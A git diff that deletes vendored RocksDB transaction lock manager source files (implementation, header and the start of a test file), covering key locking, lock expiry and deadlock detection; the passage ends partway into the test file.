index a72c2a1..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc
+++ /dev/null
@@ -1,742 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/transaction_lock_mgr.h"
-
-#include <inttypes.h>
-
-#include <algorithm>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction_db_mutex.h"
-#include "util/cast_util.h"
-#include "util/murmurhash.h"
-#include "util/sync_point.h"
-#include "util/thread_local.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-namespace rocksdb {
-
-struct LockInfo {
-  bool exclusive;
-  autovector<TransactionID> txn_ids;
-
-  // Transaction locks are not valid after this time in us
-  uint64_t expiration_time;
-
-  LockInfo(TransactionID id, uint64_t time, bool ex)
-      : exclusive(ex), expiration_time(time) {
-    txn_ids.push_back(id);
-  }
-  LockInfo(const LockInfo& lock_info)
-      : exclusive(lock_info.exclusive),
-        txn_ids(lock_info.txn_ids),
-        expiration_time(lock_info.expiration_time) {}
-};
-
-struct LockMapStripe {
-  explicit LockMapStripe(std::shared_ptr<TransactionDBMutexFactory> factory) {
-    stripe_mutex = factory->AllocateMutex();
-    stripe_cv = factory->AllocateCondVar();
-    assert(stripe_mutex);
-    assert(stripe_cv);
-  }
-
-  // Mutex must be held before modifying keys map
-  std::shared_ptr<TransactionDBMutex> stripe_mutex;
-
-  // Condition Variable per stripe for waiting on a lock
-  std::shared_ptr<TransactionDBCondVar> stripe_cv;
-
-  // Locked keys mapped to the info about the transactions that locked them.
-  // TODO(agiardullo): Explore performance of other data structures.
-  std::unordered_map<std::string, LockInfo> keys;
-};
-
-// Map of #num_stripes LockMapStripes
-struct LockMap {
-  explicit LockMap(size_t num_stripes,
-                   std::shared_ptr<TransactionDBMutexFactory> factory)
-      : num_stripes_(num_stripes) {
-    lock_map_stripes_.reserve(num_stripes);
-    for (size_t i = 0; i < num_stripes; i++) {
-      LockMapStripe* stripe = new LockMapStripe(factory);
-      lock_map_stripes_.push_back(stripe);
-    }
-  }
-
-  ~LockMap() {
-    for (auto stripe : lock_map_stripes_) {
-      delete stripe;
-    }
-  }
-
-  // Number of sepearate LockMapStripes to create, each with their own Mutex
-  const size_t num_stripes_;
-
-  // Count of keys that are currently locked in this column family.
-  // (Only maintained if TransactionLockMgr::max_num_locks_ is positive.)
-  std::atomic<int64_t> lock_cnt{0};
-
-  std::vector<LockMapStripe*> lock_map_stripes_;
-
-  size_t GetStripe(const std::string& key) const;
-};
-
-void DeadlockInfoBuffer::AddNewPath(DeadlockPath path) {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  if (paths_buffer_.empty()) {
-    return;
-  }
-
-  paths_buffer_[buffer_idx_] = path;
-  buffer_idx_ = (buffer_idx_ + 1) % paths_buffer_.size();
-}
-
-void DeadlockInfoBuffer::Resize(uint32_t target_size) {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  paths_buffer_ = Normalize();
-
-  // Drop the deadlocks that will no longer be needed ater the normalize
-  if (target_size < paths_buffer_.size()) {
-    paths_buffer_.erase(
-        paths_buffer_.begin(),
-        paths_buffer_.begin() + (paths_buffer_.size() - target_size));
-    buffer_idx_ = 0;
-  }
-  // Resize the buffer to the target size and restore the buffer's idx
-  else {
-    auto prev_size = paths_buffer_.size();
-    paths_buffer_.resize(target_size);
-    buffer_idx_ = (uint32_t)prev_size;
-  }
-}
-
-std::vector<DeadlockPath> DeadlockInfoBuffer::Normalize() {
-  auto working = paths_buffer_;
-
-  if (working.empty()) {
-    return working;
-  }
-
-  // Next write occurs at a nonexistent path's slot
-  if (paths_buffer_[buffer_idx_].empty()) {
-    working.resize(buffer_idx_);
-  } else {
-    std::rotate(working.begin(), working.begin() + buffer_idx_, working.end());
-  }
-
-  return working;
-}
-
-std::vector<DeadlockPath> DeadlockInfoBuffer::PrepareBuffer() {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  // Reversing the normalized vector returns the latest deadlocks first
-  auto working = Normalize();
-  std::reverse(working.begin(), working.end());
-
-  return working;
-}
-
-namespace {
-void UnrefLockMapsCache(void* ptr) {
-  // Called when a thread exits or a ThreadLocalPtr gets destroyed.
-  auto lock_maps_cache =
-      static_cast<std::unordered_map<uint32_t, std::shared_ptr<LockMap>>*>(ptr);
-  delete lock_maps_cache;
-}
-}  // anonymous namespace
-
-TransactionLockMgr::TransactionLockMgr(
-    TransactionDB* txn_db, size_t default_num_stripes, int64_t max_num_locks,
-    uint32_t max_num_deadlocks,
-    std::shared_ptr<TransactionDBMutexFactory> mutex_factory)
-    : txn_db_impl_(nullptr),
-      default_num_stripes_(default_num_stripes),
-      max_num_locks_(max_num_locks),
-      lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)),
-      dlock_buffer_(max_num_deadlocks),
-      mutex_factory_(mutex_factory) {
-  assert(txn_db);
-  txn_db_impl_ =
-      static_cast_with_check<PessimisticTransactionDB, TransactionDB>(txn_db);
-}
-
-TransactionLockMgr::~TransactionLockMgr() {}
-
-size_t LockMap::GetStripe(const std::string& key) const {
-  assert(num_stripes_ > 0);
-  static murmur_hash hash;
-  size_t stripe = hash(key) % num_stripes_;
-  return stripe;
-}
-
-void TransactionLockMgr::AddColumnFamily(uint32_t column_family_id) {
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  if (lock_maps_.find(column_family_id) == lock_maps_.end()) {
-    lock_maps_.emplace(column_family_id,
-                       std::shared_ptr<LockMap>(
-                           new LockMap(default_num_stripes_, mutex_factory_)));
-  } else {
-    // column_family already exists in lock map
-    assert(false);
-  }
-}
-
-void TransactionLockMgr::RemoveColumnFamily(uint32_t column_family_id) {
-  // Remove lock_map for this column family.  Since the lock map is stored
-  // as a shared ptr, concurrent transactions can still keep using it
-  // until they release their references to it.
-  {
-    InstrumentedMutexLock l(&lock_map_mutex_);
-
-    auto lock_maps_iter = lock_maps_.find(column_family_id);
-    assert(lock_maps_iter != lock_maps_.end());
-
-    lock_maps_.erase(lock_maps_iter);
-  }  // lock_map_mutex_
-
-  // Clear all thread-local caches
-  autovector<void*> local_caches;
-  lock_maps_cache_->Scrape(&local_caches, nullptr);
-  for (auto cache : local_caches) {
-    delete static_cast<LockMaps*>(cache);
-  }
-}
-
-// Look up the LockMap shared_ptr for a given column_family_id.
-// Note:  The LockMap is only valid as long as the caller is still holding on
-//   to the returned shared_ptr.
-std::shared_ptr<LockMap> TransactionLockMgr::GetLockMap(
-    uint32_t column_family_id) {
-  // First check thread-local cache
-  if (lock_maps_cache_->Get() == nullptr) {
-    lock_maps_cache_->Reset(new LockMaps());
-  }
-
-  auto lock_maps_cache = static_cast<LockMaps*>(lock_maps_cache_->Get());
-
-  auto lock_map_iter = lock_maps_cache->find(column_family_id);
-  if (lock_map_iter != lock_maps_cache->end()) {
-    // Found lock map for this column family.
-    return lock_map_iter->second;
-  }
-
-  // Not found in local cache, grab mutex and check shared LockMaps
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  lock_map_iter = lock_maps_.find(column_family_id);
-  if (lock_map_iter == lock_maps_.end()) {
-    return std::shared_ptr<LockMap>(nullptr);
-  } else {
-    // Found lock map.  Store in thread-local cache and return.
-    std::shared_ptr<LockMap>& lock_map = lock_map_iter->second;
-    lock_maps_cache->insert({column_family_id, lock_map});
-
-    return lock_map;
-  }
-}
-
-// Returns true if this lock has expired and can be acquired by another
-// transaction.
-// If false, sets *expire_time to the expiration time of the lock according
-// to Env->GetMicros() or 0 if no expiration.
-bool TransactionLockMgr::IsLockExpired(TransactionID txn_id,
-                                       const LockInfo& lock_info, Env* env,
-                                       uint64_t* expire_time) {
-  auto now = env->NowMicros();
-
-  bool expired =
-      (lock_info.expiration_time > 0 && lock_info.expiration_time <= now);
-
-  if (!expired && lock_info.expiration_time > 0) {
-    // return how many microseconds until lock will be expired
-    *expire_time = lock_info.expiration_time;
-  } else {
-    for (auto id : lock_info.txn_ids) {
-      if (txn_id == id) {
-        continue;
-      }
-
-      bool success = txn_db_impl_->TryStealingExpiredTransactionLocks(id);
-      if (!success) {
-        expired = false;
-        break;
-      }
-      *expire_time = 0;
-    }
-  }
-
-  return expired;
-}
-
-Status TransactionLockMgr::TryLock(PessimisticTransaction* txn,
-                                   uint32_t column_family_id,
-                                   const std::string& key, Env* env,
-                                   bool exclusive) {
-  // Lookup lock map for this column family id
-  std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-  LockMap* lock_map = lock_map_ptr.get();
-  if (lock_map == nullptr) {
-    char msg[255];
-    snprintf(msg, sizeof(msg), "Column family id not found: %" PRIu32,
-             column_family_id);
-
-    return Status::InvalidArgument(msg);
-  }
-
-  // Need to lock the mutex for the stripe that this key hashes to
-  size_t stripe_num = lock_map->GetStripe(key);
-  assert(lock_map->lock_map_stripes_.size() > stripe_num);
-  LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-  LockInfo lock_info(txn->GetID(), txn->GetExpirationTime(), exclusive);
-  int64_t timeout = txn->GetLockTimeout();
-
-  return AcquireWithTimeout(txn, lock_map, stripe, column_family_id, key, env,
-                            timeout, lock_info);
-}
-
-// Helper function for TryLock().
-Status TransactionLockMgr::AcquireWithTimeout(
-    PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe,
-    uint32_t column_family_id, const std::string& key, Env* env,
-    int64_t timeout, const LockInfo& lock_info) {
-  Status result;
-  uint64_t start_time = 0;
-  uint64_t end_time = 0;
-
-  if (timeout > 0) {
-    start_time = env->NowMicros();
-    end_time = start_time + timeout;
-  }
-
-  if (timeout < 0) {
-    // If timeout is negative, we wait indefinitely to acquire the lock
-    result = stripe->stripe_mutex->Lock();
-  } else {
-    result = stripe->stripe_mutex->TryLockFor(timeout);
-  }
-
-  if (!result.ok()) {
-    // failed to acquire mutex
-    return result;
-  }
-
-  // Acquire lock if we are able to
-  uint64_t expire_time_hint = 0;
-  autovector<TransactionID> wait_ids;
-  result = AcquireLocked(lock_map, stripe, key, env, lock_info,
-                         &expire_time_hint, &wait_ids);
-
-  if (!result.ok() && timeout != 0) {
-    // If we weren't able to acquire the lock, we will keep retrying as long
-    // as the timeout allows.
-    bool timed_out = false;
-    do {
-      // Decide how long to wait
-      int64_t cv_end_time = -1;
-
-      // Check if held lock's expiration time is sooner than our timeout
-      if (expire_time_hint > 0 &&
-          (timeout < 0 || (timeout > 0 && expire_time_hint < end_time))) {
-        // expiration time is sooner than our timeout
-        cv_end_time = expire_time_hint;
-      } else if (timeout >= 0) {
-        cv_end_time = end_time;
-      }
-
-      assert(result.IsBusy() || wait_ids.size() != 0);
-
-      // We are dependent on a transaction to finish, so perform deadlock
-      // detection.
-      if (wait_ids.size() != 0) {
-        if (txn->IsDeadlockDetect()) {
-          if (IncrementWaiters(txn, wait_ids, key, column_family_id,
-                               lock_info.exclusive)) {
-            result = Status::Busy(Status::SubCode::kDeadlock);
-            stripe->stripe_mutex->UnLock();
-            return result;
-          }
-        }
-        txn->SetWaitingTxn(wait_ids, column_family_id, &key);
-      }
-
-      TEST_SYNC_POINT("TransactionLockMgr::AcquireWithTimeout:WaitingTxn");
-      if (cv_end_time < 0) {
-        // Wait indefinitely
-        result = stripe->stripe_cv->Wait(stripe->stripe_mutex);
-      } else {
-        uint64_t now = env->NowMicros();
-        if (static_cast<uint64_t>(cv_end_time) > now) {
-          result = stripe->stripe_cv->WaitFor(stripe->stripe_mutex,
-                                              cv_end_time - now);
-        }
-      }
-
-      if (wait_ids.size() != 0) {
-        txn->ClearWaitingTxn();
-        if (txn->IsDeadlockDetect()) {
-          DecrementWaiters(txn, wait_ids);
-        }
-      }
-
-      if (result.IsTimedOut()) {
-          timed_out = true;
-          // Even though we timed out, we will still make one more attempt to
-          // acquire lock below (it is possible the lock expired and we
-          // were never signaled).
-      }
-
-      if (result.ok() || result.IsTimedOut()) {
-        result = AcquireLocked(lock_map, stripe, key, env, lock_info,
-                               &expire_time_hint, &wait_ids);
-      }
-    } while (!result.ok() && !timed_out);
-  }
-
-  stripe->stripe_mutex->UnLock();
-
-  return result;
-}
-
-void TransactionLockMgr::DecrementWaiters(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids) {
-  std::lock_guard<std::mutex> lock(wait_txn_map_mutex_);
-  DecrementWaitersImpl(txn, wait_ids);
-}
-
-void TransactionLockMgr::DecrementWaitersImpl(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids) {
-  auto id = txn->GetID();
-  assert(wait_txn_map_.Contains(id));
-  wait_txn_map_.Delete(id);
-
-  for (auto wait_id : wait_ids) {
-    rev_wait_txn_map_.Get(wait_id)--;
-    if (rev_wait_txn_map_.Get(wait_id) == 0) {
-      rev_wait_txn_map_.Delete(wait_id);
-    }
-  }
-}
-
-bool TransactionLockMgr::IncrementWaiters(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids, const std::string& key,
-    const uint32_t& cf_id, const bool& exclusive) {
-  auto id = txn->GetID();
-  std::vector<int> queue_parents(txn->GetDeadlockDetectDepth());
-  std::vector<TransactionID> queue_values(txn->GetDeadlockDetectDepth());
-  std::lock_guard<std::mutex> lock(wait_txn_map_mutex_);
-  assert(!wait_txn_map_.Contains(id));
-
-  wait_txn_map_.Insert(id, {wait_ids, cf_id, key, exclusive});
-
-  for (auto wait_id : wait_ids) {
-    if (rev_wait_txn_map_.Contains(wait_id)) {
-      rev_wait_txn_map_.Get(wait_id)++;
-    } else {
-      rev_wait_txn_map_.Insert(wait_id, 1);
-    }
-  }
-
-  // No deadlock if nobody is waiting on self.
-  if (!rev_wait_txn_map_.Contains(id)) {
-    return false;
-  }
-
-  const auto* next_ids = &wait_ids;
-  int parent = -1;
-  for (int tail = 0, head = 0; head < txn->GetDeadlockDetectDepth(); head++) {
-    int i = 0;
-    if (next_ids) {
-      for (; i < static_cast<int>(next_ids->size()) &&
-             tail + i < txn->GetDeadlockDetectDepth();
-           i++) {
-        queue_values[tail + i] = (*next_ids)[i];
-        queue_parents[tail + i] = parent;
-      }
-      tail += i;
-    }
-
-    // No more items in the list, meaning no deadlock.
-    if (tail == head) {
-      return false;
-    }
-
-    auto next = queue_values[head];
-    if (next == id) {
-      std::vector<DeadlockInfo> path;
-      while (head != -1) {
-        assert(wait_txn_map_.Contains(queue_values[head]));
-
-        auto extracted_info = wait_txn_map_.Get(queue_values[head]);
-        path.push_back({queue_values[head], extracted_info.m_cf_id,
-                        extracted_info.m_waiting_key,
-                        extracted_info.m_exclusive});
-        head = queue_parents[head];
-      }
-      std::reverse(path.begin(), path.end());
-      dlock_buffer_.AddNewPath(DeadlockPath(path));
-      DecrementWaitersImpl(txn, wait_ids);
-      return true;
-    } else if (!wait_txn_map_.Contains(next)) {
-      next_ids = nullptr;
-      continue;
-    } else {
-      parent = head;
-      next_ids = &(wait_txn_map_.Get(next).m_neighbors);
-    }
-  }
-
-  // Wait cycle too big, just assume deadlock.
-  dlock_buffer_.AddNewPath(DeadlockPath(true));
-  DecrementWaitersImpl(txn, wait_ids);
-  return true;
-}
-
-// Try to lock this key after we have acquired the mutex.
-// Sets *expire_time to the expiration time in microseconds
-//  or 0 if no expiration.
-// REQUIRED:  Stripe mutex must be held.
-Status TransactionLockMgr::AcquireLocked(LockMap* lock_map,
-                                         LockMapStripe* stripe,
-                                         const std::string& key, Env* env,
-                                         const LockInfo& txn_lock_info,
-                                         uint64_t* expire_time,
-                                         autovector<TransactionID>* txn_ids) {
-  assert(txn_lock_info.txn_ids.size() == 1);
-
-  Status result;
-  // Check if this key is already locked
-  if (stripe->keys.find(key) != stripe->keys.end()) {
-    // Lock already held
-    LockInfo& lock_info = stripe->keys.at(key);
-    assert(lock_info.txn_ids.size() == 1 || !lock_info.exclusive);
-
-    if (lock_info.exclusive || txn_lock_info.exclusive) {
-      if (lock_info.txn_ids.size() == 1 &&
-          lock_info.txn_ids[0] == txn_lock_info.txn_ids[0]) {
-        // The list contains one txn and we're it, so just take it.
-        lock_info.exclusive = txn_lock_info.exclusive;
-        lock_info.expiration_time = txn_lock_info.expiration_time;
-      } else {
-        // Check if it's expired. Skips over txn_lock_info.txn_ids[0] in case
-        // it's there for a shared lock with multiple holders which was not
-        // caught in the first case.
-        if (IsLockExpired(txn_lock_info.txn_ids[0], lock_info, env,
-                          expire_time)) {
-          // lock is expired, can steal it
-          lock_info.txn_ids = txn_lock_info.txn_ids;
-          lock_info.exclusive = txn_lock_info.exclusive;
-          lock_info.expiration_time = txn_lock_info.expiration_time;
-          // lock_cnt does not change
-        } else {
-          result = Status::TimedOut(Status::SubCode::kLockTimeout);
-          *txn_ids = lock_info.txn_ids;
-        }
-      }
-    } else {
-      // We are requesting shared access to a shared lock, so just grant it.
-      lock_info.txn_ids.push_back(txn_lock_info.txn_ids[0]);
-      // Using std::max means that expiration time never goes down even when
-      // a transaction is removed from the list. The correct solution would be
-      // to track expiry for every transaction, but this would also work for
-      // now.
-      lock_info.expiration_time =
-          std::max(lock_info.expiration_time, txn_lock_info.expiration_time);
-    }
-  } else {  // Lock not held.
-    // Check lock limit
-    if (max_num_locks_ > 0 &&
-        lock_map->lock_cnt.load(std::memory_order_acquire) >= max_num_locks_) {
-      result = Status::Busy(Status::SubCode::kLockLimit);
-    } else {
-      // acquire lock
-      stripe->keys.insert({key, txn_lock_info});
-
-      // Maintain lock count if there is a limit on the number of locks
-      if (max_num_locks_) {
-        lock_map->lock_cnt++;
-      }
-    }
-  }
-
-  return result;
-}
-
-void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn,
-                                   const std::string& key,
-                                   LockMapStripe* stripe, LockMap* lock_map,
-                                   Env* env) {
-  TransactionID txn_id = txn->GetID();
-
-  auto stripe_iter = stripe->keys.find(key);
-  if (stripe_iter != stripe->keys.end()) {
-    auto& txns = stripe_iter->second.txn_ids;
-    auto txn_it = std::find(txns.begin(), txns.end(), txn_id);
-    // Found the key we locked.  unlock it.
-    if (txn_it != txns.end()) {
-      if (txns.size() == 1) {
-        stripe->keys.erase(stripe_iter);
-      } else {
-        auto last_it = txns.end() - 1;
-        if (txn_it != last_it) {
-          *txn_it = *last_it;
-        }
-        txns.pop_back();
-      }
-
-      if (max_num_locks_ > 0) {
-        // Maintain lock count if there is a limit on the number of locks.
-        assert(lock_map->lock_cnt.load(std::memory_order_relaxed) > 0);
-        lock_map->lock_cnt--;
-      }
-    }
-  } else {
-    // This key is either not locked or locked by someone else.  This should
-    // only happen if the unlocking transaction has expired.
-    assert(txn->GetExpirationTime() > 0 &&
-           txn->GetExpirationTime() < env->NowMicros());
-  }
-}
-
-void TransactionLockMgr::UnLock(PessimisticTransaction* txn,
-                                uint32_t column_family_id,
-                                const std::string& key, Env* env) {
-  std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-  LockMap* lock_map = lock_map_ptr.get();
-  if (lock_map == nullptr) {
-    // Column Family must have been dropped.
-    return;
-  }
-
-  // Lock the mutex for the stripe that this key hashes to
-  size_t stripe_num = lock_map->GetStripe(key);
-  assert(lock_map->lock_map_stripes_.size() > stripe_num);
-  LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-  stripe->stripe_mutex->Lock();
-  UnLockKey(txn, key, stripe, lock_map, env);
-  stripe->stripe_mutex->UnLock();
-
-  // Signal waiting threads to retry locking
-  stripe->stripe_cv->NotifyAll();
-}
-
-void TransactionLockMgr::UnLock(const PessimisticTransaction* txn,
-                                const TransactionKeyMap* key_map, Env* env) {
-  for (auto& key_map_iter : *key_map) {
-    uint32_t column_family_id = key_map_iter.first;
-    auto& keys = key_map_iter.second;
-
-    std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-    LockMap* lock_map = lock_map_ptr.get();
-
-    if (lock_map == nullptr) {
-      // Column Family must have been dropped.
-      return;
-    }
-
-    // Bucket keys by lock_map_ stripe
-    std::unordered_map<size_t, std::vector<const std::string*>> keys_by_stripe(
-        std::max(keys.size(), lock_map->num_stripes_));
-
-    for (auto& key_iter : keys) {
-      const std::string& key = key_iter.first;
-
-      size_t stripe_num = lock_map->GetStripe(key);
-      keys_by_stripe[stripe_num].push_back(&key);
-    }
-
-    // For each stripe, grab the stripe mutex and unlock all keys in this stripe
-    for (auto& stripe_iter : keys_by_stripe) {
-      size_t stripe_num = stripe_iter.first;
-      auto& stripe_keys = stripe_iter.second;
-
-      assert(lock_map->lock_map_stripes_.size() > stripe_num);
-      LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-      stripe->stripe_mutex->Lock();
-
-      for (const std::string* key : stripe_keys) {
-        UnLockKey(txn, *key, stripe, lock_map, env);
-      }
-
-      stripe->stripe_mutex->UnLock();
-
-      // Signal waiting threads to retry locking
-      stripe->stripe_cv->NotifyAll();
-    }
-  }
-}
-
-TransactionLockMgr::LockStatusData TransactionLockMgr::GetLockStatusData() {
-  LockStatusData data;
-  // Lock order here is important. The correct order is lock_map_mutex_, then
-  // for every column family ID in ascending order lock every stripe in
-  // ascending order.
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  std::vector<uint32_t> cf_ids;
-  for (const auto& map : lock_maps_) {
-    cf_ids.push_back(map.first);
-  }
-  std::sort(cf_ids.begin(), cf_ids.end());
-
-  for (auto i : cf_ids) {
-    const auto& stripes = lock_maps_[i]->lock_map_stripes_;
-    // Iterate and lock all stripes in ascending order.
-    for (const auto& j : stripes) {
-      j->stripe_mutex->Lock();
-      for (const auto& it : j->keys) {
-        struct KeyLockInfo info;
-        info.exclusive = it.second.exclusive;
-        info.key = it.first;
-        for (const auto& id : it.second.txn_ids) {
-          info.ids.push_back(id);
-        }
-        data.insert({i, info});
-      }
-    }
-  }
-
-  // Unlock everything. Unlocking order is not important.
-  for (auto i : cf_ids) {
-    const auto& stripes = lock_maps_[i]->lock_map_stripes_;
-    for (const auto& j : stripes) {
-      j->stripe_mutex->UnLock();
-    }
-  }
-
-  return data;
-}
-std::vector<DeadlockPath> TransactionLockMgr::GetDeadlockInfoBuffer() {
-  return dlock_buffer_.PrepareBuffer();
-}
-
-void TransactionLockMgr::Resize(uint32_t target_size) {
-  dlock_buffer_.Resize(target_size);
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h b/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h
deleted file mode 100644
index abf7c5d..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <chrono>
-#include <string>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/utilities/transaction.h"
-#include "util/autovector.h"
-#include "util/hash_map.h"
-#include "util/thread_local.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-struct LockInfo;
-struct LockMap;
-struct LockMapStripe;
-
-struct DeadlockInfoBuffer {
- private:
-  std::vector<DeadlockPath> paths_buffer_;
-  uint32_t buffer_idx_;
-  std::mutex paths_buffer_mutex_;
-  std::vector<DeadlockPath> Normalize();
-
- public:
-  explicit DeadlockInfoBuffer(uint32_t n_latest_dlocks)
-      : paths_buffer_(n_latest_dlocks), buffer_idx_(0) {}
-  void AddNewPath(DeadlockPath path);
-  void Resize(uint32_t target_size);
-  std::vector<DeadlockPath> PrepareBuffer();
-};
-
-struct TrackedTrxInfo {
-  autovector<TransactionID> m_neighbors;
-  uint32_t m_cf_id;
-  std::string m_waiting_key;
-  bool m_exclusive;
-};
-
-class Slice;
-class PessimisticTransactionDB;
-
-class TransactionLockMgr {
- public:
-  TransactionLockMgr(TransactionDB* txn_db, size_t default_num_stripes,
-                     int64_t max_num_locks, uint32_t max_num_deadlocks,
-                     std::shared_ptr<TransactionDBMutexFactory> factory);
-
-  ~TransactionLockMgr();
-
-  // Creates a new LockMap for this column family.  Caller should guarantee
-  // that this column family does not already exist.
-  void AddColumnFamily(uint32_t column_family_id);
-
-  // Deletes the LockMap for this column family.  Caller should guarantee that
-  // this column family is no longer in use.
-  void RemoveColumnFamily(uint32_t column_family_id);
-
-  // Attempt to lock key.  If OK status is returned, the caller is responsible
-  // for calling UnLock() on this key.
-  Status TryLock(PessimisticTransaction* txn, uint32_t column_family_id,
-                 const std::string& key, Env* env, bool exclusive);
-
-  // Unlock a key locked by TryLock().  txn must be the same Transaction that
-  // locked this key.
-  void UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* keys,
-              Env* env);
-  void UnLock(PessimisticTransaction* txn, uint32_t column_family_id,
-              const std::string& key, Env* env);
-
-  using LockStatusData = std::unordered_multimap<uint32_t, KeyLockInfo>;
-  LockStatusData GetLockStatusData();
-  std::vector<DeadlockPath> GetDeadlockInfoBuffer();
-  void Resize(uint32_t);
-
- private:
-  PessimisticTransactionDB* txn_db_impl_;
-
-  // Default number of lock map stripes per column family
-  const size_t default_num_stripes_;
-
-  // Limit on number of keys locked per column family
-  const int64_t max_num_locks_;
-
-  // The following lock order must be satisfied in order to avoid deadlocking
-  // ourselves.
-  //   - lock_map_mutex_
-  //   - stripe mutexes in ascending cf id, ascending stripe order
-  //   - wait_txn_map_mutex_
-  //
-  // Must be held when accessing/modifying lock_maps_.
-  InstrumentedMutex lock_map_mutex_;
-
-  // Map of ColumnFamilyId to locked key info
-  using LockMaps = std::unordered_map<uint32_t, std::shared_ptr<LockMap>>;
-  LockMaps lock_maps_;
-
-  // Thread-local cache of entries in lock_maps_.  This is an optimization
-  // to avoid acquiring a mutex in order to look up a LockMap
-  std::unique_ptr<ThreadLocalPtr> lock_maps_cache_;
-
-  // Must be held when modifying wait_txn_map_ and rev_wait_txn_map_.
-  std::mutex wait_txn_map_mutex_;
-
-  // Maps from waitee -> number of waiters.
-  HashMap<TransactionID, int> rev_wait_txn_map_;
-  // Maps from waiter -> waitee.
-  HashMap<TransactionID, TrackedTrxInfo> wait_txn_map_;
-  DeadlockInfoBuffer dlock_buffer_;
-
-  // Used to allocate mutexes/condvars to use when locking keys
-  std::shared_ptr<TransactionDBMutexFactory> mutex_factory_;
-
-  bool IsLockExpired(TransactionID txn_id, const LockInfo& lock_info, Env* env,
-                     uint64_t* wait_time);
-
-  std::shared_ptr<LockMap> GetLockMap(uint32_t column_family_id);
-
-  Status AcquireWithTimeout(PessimisticTransaction* txn, LockMap* lock_map,
-                            LockMapStripe* stripe, uint32_t column_family_id,
-                            const std::string& key, Env* env, int64_t timeout,
-                            const LockInfo& lock_info);
-
-  Status AcquireLocked(LockMap* lock_map, LockMapStripe* stripe,
-                       const std::string& key, Env* env,
-                       const LockInfo& lock_info, uint64_t* wait_time,
-                       autovector<TransactionID>* txn_ids);
-
-  void UnLockKey(const PessimisticTransaction* txn, const std::string& key,
-                 LockMapStripe* stripe, LockMap* lock_map, Env* env);
-
-  bool IncrementWaiters(const PessimisticTransaction* txn,
-                        const autovector<TransactionID>& wait_ids,
-                        const std::string& key, const uint32_t& cf_id,
-                        const bool& exclusive);
-  void DecrementWaiters(const PessimisticTransaction* txn,
-                        const autovector<TransactionID>& wait_ids);
-  void DecrementWaitersImpl(const PessimisticTransaction* txn,
-                            const autovector<TransactionID>& wait_ids);
-
-  // No copying allowed
-  TransactionLockMgr(const TransactionLockMgr&);
-  void operator=(const TransactionLockMgr&);
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_test.cc b/thirdparty/rocksdb/utilities/transactions/transaction_test.cc
deleted file mode 100644
index eac8e56..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_test.cc
+++ /dev/null
@@ -1,4884 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <functional>
-#include <string>
-#include <thread>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "table/mock_table.h"
-#include "util/fault_injection_test_env.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/transaction_test_util.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-#include "port/port.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class TransactionTest : public ::testing::TestWithParam<
-                            std::tuple<bool, bool, TxnDBWritePolicy>> {
- public:
-  TransactionDB* db;
-  FaultInjectionTestEnv* env;
-  string dbname;
-  Options options;
